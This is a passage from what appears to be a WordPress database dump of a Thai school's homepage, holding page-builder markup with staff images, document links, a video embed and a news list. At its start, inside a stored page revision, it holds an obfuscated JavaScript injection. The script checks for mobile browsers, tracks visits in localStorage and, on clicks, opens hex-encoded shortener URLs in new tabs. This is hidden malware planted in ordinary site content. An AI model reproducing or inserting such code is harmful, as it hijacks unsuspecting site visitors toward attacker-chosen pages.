',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-06-27 15:22:49','2025-06-27 08:22:49','',19,'http://watprato.ssk.in.th/?p=570',0,'revision','',0);
INSERT INTO `wp_posts` VALUES
(572,1,'2025-06-27 15:25:35','2025-06-27 08:25:35','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_8396d5-78\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_8396d5-78\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-544\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n.jpg\" alt=\"รางวัล &quot;สถานศึกษาที่มีวิธีปฏิบัติเป็นเลิศ&quot;\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c44218-61\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c44218-61\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-538\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508661855_122233182278202781_1372776762413040353_n.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพัน